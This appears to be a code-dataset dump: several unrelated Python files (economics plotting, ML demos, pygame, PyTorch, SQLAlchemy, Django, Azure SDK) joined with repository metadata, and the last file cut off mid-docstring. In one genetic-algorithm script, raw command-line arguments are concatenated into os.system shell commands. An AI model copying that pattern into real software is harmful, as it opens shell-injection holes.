import numpy as np import matplotlib.pyplot as plt #パラメータ設定 a = 0.3 b = 0.99 d = 0.25 At = 1.0 numer = eval("(1/b+d-1)") #分子 denom = eval("a*At") #分母 exp = eval("1/(a-1)") #指数 #Δk=0軌跡の式 K = np.arange(0, 4, 0.01) def Ct(K): Ct = At * K**a - d * K return Ct #Δc=0軌跡の式 Kt = (numer/denom)**exp #消費と資本の軌跡グラフ作図 plt.plot(K,Ct(K)) #Δc=0軌跡のグラフ plt.vlines([Kt], 0, 1.0, "blue", linestyle='solid') #Δk=0軌跡のグラフ plt.ylim(0, 1) plt.plot(Kt,Ct(Kt),"ro") #双方の軌跡の交点を赤く表示 plt.xlabel("Kt") plt.ylabel("Ct", rotation=0) plt.text(2.5, 0.8, "ΔK=0") plt.text(1.5, 0.6, "ΔC=0") plt.show() #パラメータを追加 maxT = 30 #期間 #経路の計算 sC = np.empty(maxT) sC[0] = 0.65 #消費の初期値 sK = np.empty(maxT) sK[0] = Kt * 0.5 #資本の初期値 for t in range(maxT-1): sC[t+1] = b*sC[t] * (a*(sK[t]**a - sC[t]+(1-d)*sK[t])**(a-1)+1-d) sK[t+1] = sK[t]**a - sC[t] + (1-d)*sK[t] #資本と消費の経路グラフ作図 t = np.arange(0, 4, 1.0) plt.plot(sK, sC) plt.plot(K,Ct(K)) plt.vlines([Kt], 0, 1.5, "blue", linestyle='solid') plt.plot(Kt,Ct(Kt),"ro") plt.xlabel("Kt") plt.ylabel("Ct", rotation=0) plt.text(2.5, 0.8, "ΔK=0") plt.text(1.4, 0.55, "ΔC=0") plt.xlim(xmax=4) plt.ylim(ymax=1.5) plt.show()
[ "noreply@github.com" ]
noreply@github.com
a583ce9389fd5048cc2a217b72beb330eb02d48b
c6e042536814dadf338fb9e68246f6c17f1c4cfa
/FourierMy.py
cbf2bbeaadf8ff8e07f0a2d327d3b265dcb58f48
[]
no_license
NazarovDevelopment/Laba
0576ed2945ce486e32843f7b25d8afe2683248a8
036f2d473673edb6ad5754dc6408b4112d1b045e
refs/heads/master
2020-04-06T03:35:03.188331
2015-04-21T19:42:31
2015-04-21T19:42:31
33,953,662
0
0
null
null
null
null
UTF-8
Python
false
false
138
py
__author__ = 'Alexey' import numpy as np def forwardfourier(data): newfftdata = np.fft.fft(data) print(data) return newfftdata
[ "anazarov94@gmail.com" ]
anazarov94@gmail.com
1024bc3664adf719b87b2553b88c5466abfc7d84
a2311e330da598bca3a38a543f0dc7e1a3656edd
/genetic_algorithm/hw2/run_once.py
1e5c307bddcc06b217c6658072550eb6fd27f435
[]
no_license
hw5773/study
9c980390e814110bef4f4760d40ef0a491758f61
973b5a9d99538ee03c8fcaaa3448e761b13fbc99
refs/heads/master
2020-04-12T02:30:36.379631
2019-11-02T04:01:21
2019-11-02T04:01:21
55,757,394
0
0
null
null
null
null
UTF-8
Python
false
false
1,747
py
import os import sys graph_type = ["maxcut50.txt", "maxcut100.txt", "maxcut500.txt"] g = graph_type[int(sys.argv[2])] graph = "../graph/" + g representation = ["chromosome.o"] selection = ["tornament_selection.o"] crossover = ["reverse_crossover.o"] mutation = ["general_mutation.o"] replacement = ["general_replacement.o"] stop = ["rate_stop_condition.o"] common = "cost.o maxcut_once.o common.o" new_dir = sys.argv[1] os.system("rm -rf *.o") os.system("mkdir " + sys.argv[1]) os.system("gcc -c *.c") #for root, dirs, files in os.walk("./"): # for f in files: # if "fixedonepoint_crossover.o" in f: # crossover.append(f) # elif "decrease_mutation.o" in f: # mutation.append(f) # elif "general_replacement.o" in f: # replacement.append(f) # elif "chromosome.o" in f: # representation.append(f) # elif "stop_condition.o" in f: # stop.append(f) # elif "roulette_selection.o" in f: # selection.append(f) # else: # continue print crossover print mutation print replacement print representation print stop print selection for b in representation: for c in crossover: for m in mutation: for r in replacement: for st in stop: for se in selection: os.system("gcc -o maxcut " + common + " " + b + " " + " " + c + " " + m + " " + r + " " + st + " local_optimization.o " + se) for num in range(int(sys.argv[3]), int(sys.argv[3])+5): file_prefix = new_dir + "/" + g.split(".")[0] + "_binary_" + c.split("_")[0] + "_" + m.split("_")[0] + "_" + r.split("_")[0] + "_" + st.split("_")[0] + "_" + se.split("_")[0] + "_" + "ONCE_S0.7_M0.3_N1000_K1_P00.51_P4_KF4_T0.7_C0.5" os.system("./maxcut " + graph + " " + file_prefix + "_" + str(num) + ".res " + file_prefix + "_" + str(num) + ".csv")
[ "hw5773@gmail.com" ]
hw5773@gmail.com
fa3e65432481dc50669a709c3740fc9753628e14
8f0524fc0171e27a15f4cf5fb3fe48ef2053b40e
/leetcode/DP/edit_distance_formula.py
e9141de529dbc4bde7fdefe5cc4713fae1837147
[]
no_license
MohammedAlewi/competitive-programming
51514fa04ba03d14f8e00031ee413d6d74df971f
960da78bfa956cb1cf79a0cd19553af97a2aa0f3
refs/heads/master
2023-02-08T20:25:58.279241
2023-02-02T00:11:23
2023-02-02T00:11:23
222,710,225
1
0
null
null
null
null
UTF-8
Python
false
false
275
py
def edit_str(s1,s2,n,m): if n<0 or m<0: return max(m,n)+1 elif s1[n]==s2[m]: return edit_str(s1,s2,n-1,m-1) else: return min(edit_str(s1,s2,n-1,m-1),edit_str(s1,s2,n,m-1),edit_str(s1,s2,n-1,m)) +1 print(edit_str("kitten","sitting",5,6))
[ "rofyalewi@gmail.com" ]
rofyalewi@gmail.com
8c7ec1217dd7bc22b88439c1f406972e4f2a9006
3bae1ed6460064f997264091aca0f37ac31c1a77
/apps/cloud_api_generator/generatedServer/tasklets/rack/create/rack_create.py
3e407f24ace515e0974c5621850b08fc380425ff
[]
no_license
racktivity/ext-pylabs-core
04d96b80ac1942754257d59e91460c3a141f0a32
53d349fa6bee0ccead29afd6676979b44c109a61
refs/heads/master
2021-01-22T10:33:18.523799
2017-06-08T09:09:28
2017-06-08T09:09:28
54,314,984
0
0
null
2017-06-08T09:09:29
2016-03-20T11:55:01
Python
UTF-8
Python
false
false
174
py
__author__ = 'aserver' __tags__ = 'rack', 'create' __priority__= 3 def main(q, i, params, tags): params['result'] = '' def match(q, i, params, tags): return True
[ "devnull@localhost" ]
devnull@localhost
68f4d4b54fede867afc44c57daef7f694fc1ae4f
6777c78344998500252845572da51a7ddaaf40da
/script/minist_SVM_self.py
082490901d04fd4bd71ca124f6bc0d1f103d8cbe
[]
no_license
Chokurei/Kajima
2e1bfd74d997aba5d5218f10bce4655ccec7b5eb
4d5dd3bd56fe41473b4edb8836cb93d19a02bd9c
refs/heads/master
2021-04-06T20:18:52.624283
2018-03-15T17:47:31
2018-03-15T17:47:31
125,337,676
0
0
null
null
null
null
UTF-8
Python
false
false
1,403
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Fri Mar 2 11:39:49 2018 @author: kaku """ print(__doc__) import matplotlib.pyplot as plt from sklearn import datasets, svm, metrics digits = datasets.load_digits() images_and_labels = list(zip(digits.images, digits.target)) for index, (image, label) in enumerate(images_and_labels[:4]): plt.subplot(2, 4, index + 1) plt.axis('off') plt.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest') plt.title('Training: %i'%label) n_samples = len(digits.images) # Change into m x n data = digits.images.reshape((n_samples, -1)) classifier = svm.SVC(gamma = 0.001) # We learn the digits on the first half of the digits classifier.fit(data[:n_samples//2], digits.target[:n_samples//2]) expected = digits.target[n_samples//2:] predicted = classifier.predict(data[n_samples//2:]) print('Classification report for classifier %s:\n%s\n' %(classifier, metrics.classification_report(expected, predicted))) print('Confusion matrix:\n%s'% metrics.confusion_matrix(expected, predicted)) images_and_predictions = list(zip(digits.images[n_samples//2:], predicted)) for index, (image, prediction) in enumerate(images_and_predictions[:4]): plt.subplot(2,4,index + 5) plt.axis('off') plt.imshow(image, cmap = plt.cm.gray_r, interpolation='nearest') plt.title('Prediction: %i' %prediction) plt.show()
[ "guozhilingty@gmail.com" ]
guozhilingty@gmail.com
7e0089c1234ae3609da6e14a0889584df5f17339
0f1b763baa14a13f91c4d1a56f0b9bea27320aeb
/venv/Lib/site-packages/sqlpharmacy/column_types.py
0ef7bd3abb5454f6e126aeb1ee0bde14410d3680
[]
no_license
tangleibest/untitled
9c775ddf35e34815f0b3d305c42915804e10470c
6672699da1ad897a660098d07f7ea4c9a70126bd
refs/heads/master
2020-04-19T02:04:04.740292
2019-01-28T03:29:07
2019-01-28T03:29:07
167,891,262
0
0
null
null
null
null
UTF-8
Python
false
false
885
py
# encoding=utf-8 """ sqlpharmacy.column_types ~~~~~~~~~~~~~~~~~~~~~~ More database column types """ import json from sqlalchemy.types import TypeDecorator, String class JsonType(TypeDecorator): '''Dumps simple python data structures to json format and stores them as string Convert the data back to original python data structures when read. Differences from sqlalchemy PickleType: PickleType only supports python, JsonType supports a lot of languages Think that you might want to read the data out of database using Java or PHP(or C#...etc). ''' impl = String def process_bind_param(self, value, dialect): if value is not None: value = json.dumps(value) return value def process_result_value(self, value, dialect): if value is not None: value = json.loads(value) return value
[ "1220149242@qq.com" ]
1220149242@qq.com
ec45d45f973e36dc0e484153ced1934b3170084f
c672f9ba29546468beccbda2aaf892af41dd453a
/tcp.py
b3e26c6d05b61cc89f9c44ee33749872165b9fb8
[]
no_license
ArthonKorea/artchatbot
70773c9064f414f24a4cf34ac5270c60dee03fc8
e2dcb82b18b202ad33cda8fe49b1079eafee74ef
refs/heads/master
2021-01-01T06:01:37.182985
2017-07-18T13:19:40
2017-07-18T13:19:40
97,331,990
0
0
null
null
null
null
UTF-8
Python
false
false
901
py
import socket import chatbot def Main(): host = "localhost" port = 8000 mySocket = socket.socket() mySocket.bind((host, port)) mySocket.listen(1) conn, addr = mySocket.accept() print("Connection from: " + str(addr)) while True: data = conn.recv(1024).decode() if not data: break if "init" in str(data): conn.send("init/안녕하세요 저는 **라는 작품이에요".encode()) continue print("from connected user: " + str(data)) Words = bot.Conversation(str(data)) Translated_Words = bot.Translating_Word(Words) Output = bot.Answering(Translated_Words) #Output ="안녕" data = "response/"+str(Output) print("respon: " + str(Output)) conn.send(data.encode()) conn.close() if __name__ == '__main__': bot = chatbot.bot() Main()
[ "skawls5028@gmail.com" ]
skawls5028@gmail.com
aae84273d14923a5fb83bf35b9b0e6a31ea3d1af
a6270537b5c6d924fa6353a8f0328e07c71a0366
/numbasltiprovider/urls.py
c12994c32a9c81f0df352e00b8c9d1aa5310f5c7
[ "Apache-2.0" ]
permissive
oscarsiles/numbas-lti-provider
9b993175a6b6463a974373c7bdb2c9f38b057b89
ef7080a2593a800a1b9630c746e4f8667e2ec42d
refs/heads/master
2020-08-20T03:47:54.399198
2020-08-05T13:44:16
2020-08-05T13:44:16
215,979,486
0
0
NOASSERTION
2019-10-18T08:39:09
2019-10-18T08:39:09
null
UTF-8
Python
false
false
519
py
from django.conf import settings from django.conf.urls import url, include from django.conf.urls.static import static from django.contrib import admin urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^', include('numbas_lti.urls')), ]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if settings.DEBUG: try: import debug_toolbar urlpatterns = [ url(r'^__debug__/', include(debug_toolbar.urls)), ] + urlpatterns except ImportError: pass
[ "christianperfect@gmail.com" ]
christianperfect@gmail.com
2fb33dbd42a0f97323aa597b2052a24849bb55e3
9eb4ce67a7b7be515972be3149de488e6e78a4a7
/Protótipos/python/Movement (fluid)/game.py
6e61723e7a2420395fce5b4f3f0837f474af9372
[]
no_license
wellingtonraam/projetos-jogos
987f83da0ac82dc7ce6e4575feb7abba141aa939
3f76a8fb40d6bc9ca0954e80f225a83fa7c734dd
refs/heads/master
2020-04-18T10:11:55.729549
2020-03-21T16:00:47
2020-03-21T16:00:47
167,459,892
0
0
null
null
null
null
UTF-8
Python
false
false
2,331
py
import sys

import pygame

### author: Wellington Ramos || email: wellingtonraam@gmail.com

### Inicialize the game ###
pygame.init()

### screen size and name ###
size = width, height = 640, 480
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Character movement")

### fps ###
clock = pygame.time.Clock()

### colors ###
white = 255, 255, 255
purple = 142, 68, 173

# Cumulative offsets from the screen centre.  Positive py moves the player
# up and positive px moves it left (see the x/y computation in the loop).
py = 0
px = 0


def player(x, y):
    """Draw the player as a 40x40 purple square at (x, y)."""
    pygame.draw.rect(screen, purple, pygame.Rect(x, y, 40, 40))


# Held state for UP, DOWN, LEFT, RIGHT (in that order).
controlkey = [False, False, False, False]

# Map each arrow key to its slot in ``controlkey``.  This table replaces the
# original's two byte-identical KEYDOWN/KEYUP if-chains (and its unused
# ``pressed``/``key`` variables).
_KEY_SLOT = {
    pygame.K_UP: 0,
    pygame.K_DOWN: 1,
    pygame.K_LEFT: 2,
    pygame.K_RIGHT: 3,
}


def check_keys_py(py):
    """Advance the vertical offset by one pixel per held up/down key."""
    if controlkey[0]:
        py += 1
    if controlkey[1]:
        py -= 1
    return py


def check_keys_px(px):
    """Advance the horizontal offset by one pixel per held left/right key."""
    if controlkey[2]:
        px += 1
    if controlkey[3]:
        px -= 1
    return px


### Game loop ###
playing = True
while playing:
    ### Keyboard Event Listener ###
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            playing = False
            sys.exit()
        # One table lookup handles both press and release for all four
        # arrow keys -- True while held, False on release.
        if event.type in (pygame.KEYDOWN, pygame.KEYUP) and event.key in _KEY_SLOT:
            controlkey[_KEY_SLOT[event.key]] = event.type == pygame.KEYDOWN

    py = check_keys_py(py)
    px = check_keys_px(px)

    ### clean screen ###
    screen.fill(white)

    ### Create player (rectangle for collision) ###
    # Drawn relative to the screen centre (320, 240), offset by px/py; the
    # extra 20 centres the 40x40 square on that point.
    y = (240 - (20 + py))
    x = (320 - (20 + px))

    ### draw player ###
    player(x, y)

    ### Refresh screen ###
    pygame.display.flip()
    clock.tick(60)
[ "wellingtonraam@gmail.com" ]
wellingtonraam@gmail.com
0ea60583881a8cf87ab67946e182928fa337e2f7
e2a465c3fd63519a68d2515e6460e8e7179365ca
/models/Generator/modules.py
cf3282ce178d5f58948d96a16d8b7ac55810324a
[]
no_license
dongyyyyy/Contrast_enhanced_GAN
4c621aaec5faf280fcd4cd7900e1780892e26f77
bfa4906441b0799ae3e2490ff763260b191de794
refs/heads/master
2023-08-03T13:03:30.997329
2021-09-13T10:53:23
2021-09-13T10:53:23
403,494,868
1
0
null
null
null
null
UTF-8
Python
false
false
2,145
py
import torch.nn as nn


class ResidualBlock(nn.Module):
    """Pad->Conv->Norm->ReLU->(Dropout)->Pad->Conv->Norm with a skip path.

    CycleGAN-style residual block: the output is ``x + conv_branch(x)``.
    Spatial size and channel count are preserved.

    Args:
        in_features: number of input (= output) channels.
        norm_layer: 'instance', 'batch', or anything else for no norm.
        kernel_size: convolution kernel size.  NOTE(review): the pad amount
            is hard-coded to 1, which only preserves spatial size for
            kernel_size=3 -- confirm intent before using other sizes.
        dropout_p: dropout probability between the two halves; 0 disables.
        use_bias: whether the convolutions carry a bias term.
        padding_type: 'reflect', 'replicate', or zero padding otherwise.
    """

    def __init__(self, in_features, norm_layer='instance', kernel_size=3,
                 dropout_p=0., use_bias=False, padding_type='reflect'):
        super(ResidualBlock, self).__init__()
        self.conv = self.make_blocks(kernel_size=kernel_size,
                                     in_features=in_features,
                                     padding_type=padding_type,
                                     norm_layer=norm_layer,
                                     dropout_p=dropout_p,
                                     use_bias=use_bias)

    @staticmethod
    def _pad_conv_norm(kernel_size, in_features, padding_type, norm_layer,
                       use_bias):
        """One pad -> conv -> (norm) half of the branch.

        The original spelled this sequence out twice, byte for byte; it is
        deduplicated here.
        """
        layers = []
        conv_p = 0
        if padding_type == 'reflect':
            layers += [nn.ReflectionPad2d(1)]
        elif padding_type == 'replicate':
            layers += [nn.ReplicationPad2d(1)]
        else:
            conv_p = 1  # fall back to zero padding inside the conv itself
        layers += [nn.Conv2d(in_channels=in_features,
                             out_channels=in_features,
                             kernel_size=kernel_size,
                             padding=conv_p,
                             bias=use_bias)]
        if norm_layer == 'instance':
            layers += [nn.InstanceNorm2d(num_features=in_features,
                                         affine=False,
                                         track_running_stats=False)]
        elif norm_layer == 'batch':
            layers += [nn.BatchNorm2d(num_features=in_features,
                                      affine=True,
                                      track_running_stats=True)]
        return layers

    def make_blocks(self, kernel_size=3, in_features=256,
                    padding_type='reflect', norm_layer='instance',
                    dropout_p=0., use_bias=False):
        """Build the conv branch: two pad/conv/norm halves joined by ReLU
        (and optional Dropout)."""
        conv_block = self._pad_conv_norm(kernel_size, in_features,
                                         padding_type, norm_layer, use_bias)
        conv_block += [nn.ReLU(inplace=True)]
        if dropout_p > 0.:
            conv_block += [nn.Dropout(dropout_p)]
        conv_block += self._pad_conv_norm(kernel_size, in_features,
                                          padding_type, norm_layer, use_bias)
        return nn.Sequential(*conv_block)

    def forward(self, x):
        # BUG FIX: a residual block must add the skip connection; the
        # original returned only self.conv(x), dropping the identity path.
        return x + self.conv(x)
[ "dongyoung0218@gmail.com" ]
dongyoung0218@gmail.com
45e7ad2daa08b47300fc90982729d3862f4652cb
b806560b367d420bf413d7bac002199741e151c9
/24pro.py
b14d92381fb1bef0388380f391eb1bc9dc2d64e7
[]
no_license
umadevic/pro.py
dca7beadc62aa042779b165bc73dabb8647dde19
5e521aa8591593e56315500b224d2c15c8794fad
refs/heads/master
2020-06-23T16:08:36.430856
2019-07-24T17:42:30
2019-07-24T17:42:30
198,673,904
0
0
null
null
null
null
UTF-8
Python
false
false
281
py
def popcount_sorted(mi):
    """Return all mi-bit binary strings ordered by popcount, then lexically.

    E.g. popcount_sorted(2) -> ['00', '01', '10', '11'].
    """
    # (popcount, string) pairs sort by number of set bits first, then by the
    # string itself -- exactly what sorting the original's [count, l] lists
    # did.  The original's if/else arms were byte-identical, so that length
    # comparison was dead code and is dropped.
    pairs = sorted((b.count("1"), b)
                   for b in (bin(i)[2:].zfill(mi) for i in range(2 ** mi)))
    return [b for _, b in pairs]


if __name__ == "__main__":
    # Guarded so importing this module does not block on stdin; running the
    # script still reads mi and prints the same lines as before.
    for line in popcount_sorted(int(input())):
        print(line)
[ "noreply@github.com" ]
noreply@github.com
48dee7176bb8171d5e34ce3b814a3824745949bb
974c5a4f101d0e6f4dfa5fc2f7c641c9d2bd8184
/sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2021_03_01/operations/_dedicated_hosts_operations.py
51cb4faf00fcd17afa1aa62853dffed3a1b72cf3
[ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
permissive
gaoyp830/azure-sdk-for-python
4816f04c554dcffb7510a6b7044b0c86a2dd32e1
1c66defa502b754abcc9e5afa444ca03c609342f
refs/heads/master
2022-10-20T21:33:44.281041
2022-09-29T17:03:13
2022-09-29T17:03:13
250,355,505
0
0
MIT
2020-03-26T19:42:13
2020-03-26T19:42:12
null
UTF-8
Python
false
false
44,268
py
# pylint: disable=too-many-lines # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload from urllib.parse import parse_qs, urljoin, urlparse from azure.core.exceptions import ( ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, ResourceNotModifiedError, map_error, ) from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.polling import LROPoller, NoPolling, PollingMethod from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.utils import case_insensitive_dict from azure.mgmt.core.exceptions import ARMErrorFormat from azure.mgmt.core.polling.arm_polling import ARMPolling from .. 
import models as _models from ..._serialization import Serializer from .._vendor import _convert_request, _format_url_section T = TypeVar("T") ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False def build_create_or_update_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs) def build_update_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = 
case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs) def build_delete_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", 
resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") return HttpRequest(method="DELETE", url=_url, params=_params, **kwargs) def build_get_request( resource_group_name: str, host_group_name: str, host_name: str, subscription_id: str, *, expand: Optional[Union[str, "_models.InstanceViewTypes"]] = None, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "hostName": _SERIALIZER.url("host_name", host_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters if expand is not None: _params["$expand"] = _SERIALIZER.query("expand", expand, "str") _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) def build_list_by_host_group_request( resource_group_name: 
str, host_group_name: str, subscription_id: str, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop( "template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts", ) # pylint: disable=line-too-long path_format_arguments = { "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"), "hostGroupName": _SERIALIZER.url("host_group_name", host_group_name, "str"), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"), } _url = _format_url_section(_url, **path_format_arguments) # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) class DedicatedHostsOperations: """ .. warning:: **DO NOT** instantiate this class directly. Instead, you should access the following operations through :class:`~azure.mgmt.compute.v2021_03_01.ComputeManagementClient`'s :attr:`dedicated_hosts` attribute. 
""" models = _models def __init__(self, *args, **kwargs): input_args = list(args) self._client = input_args.pop(0) if input_args else kwargs.pop("client") self._config = input_args.pop(0) if input_args else kwargs.pop("config") self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer") self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer") def _create_or_update_initial( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: Union[_models.DedicatedHost, IO], **kwargs: Any ) -> _models.DedicatedHost: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-03-01")) # type: str content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str] cls = kwargs.pop("cls", None) # type: ClsType[_models.DedicatedHost] content_type = content_type or "application/json" _json = None _content = None if isinstance(parameters, (IO, bytes)): _content = parameters else: _json = self._serialize.body(parameters, "DedicatedHost") request = build_create_or_update_request( resource_group_name=resource_group_name, host_group_name=host_group_name, host_name=host_name, subscription_id=self._config.subscription_id, api_version=api_version, content_type=content_type, json=_json, content=_content, template_url=self._create_or_update_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) request.url = self._client.format_url(request.url) # type: ignore pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access request, stream=False, **kwargs ) response = 
pipeline_response.http_response if response.status_code not in [200, 201]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) if response.status_code == 200: deserialized = self._deserialize("DedicatedHost", pipeline_response) if response.status_code == 201: deserialized = self._deserialize("DedicatedHost", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized _create_or_update_initial.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}/hosts/{hostName}"} # type: ignore @overload def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: _models.DedicatedHost, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Required. :type parameters: ~azure.mgmt.compute.v2021_03_01.models.DedicatedHost :keyword content_type: Body Parameter content-type. Content type parameter for JSON body. Default value is "application/json". :paramtype content_type: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. 
:paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either DedicatedHost or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2021_03_01.models.DedicatedHost] :raises ~azure.core.exceptions.HttpResponseError: """ @overload def begin_create_or_update( self, resource_group_name: str, host_group_name: str, host_name: str, parameters: IO, *, content_type: str = "application/json", **kwargs: Any ) -> LROPoller[_models.DedicatedHost]: """Create or update a dedicated host . :param resource_group_name: The name of the resource group. Required. :type resource_group_name: str :param host_group_name: The name of the dedicated host group. Required. :type host_group_name: str :param host_name: The name of the dedicated host . Required. :type host_name: str :param parameters: Parameters supplied to the Create Dedicated Host. Required. :type parameters: IO :keyword content_type: Body Parameter 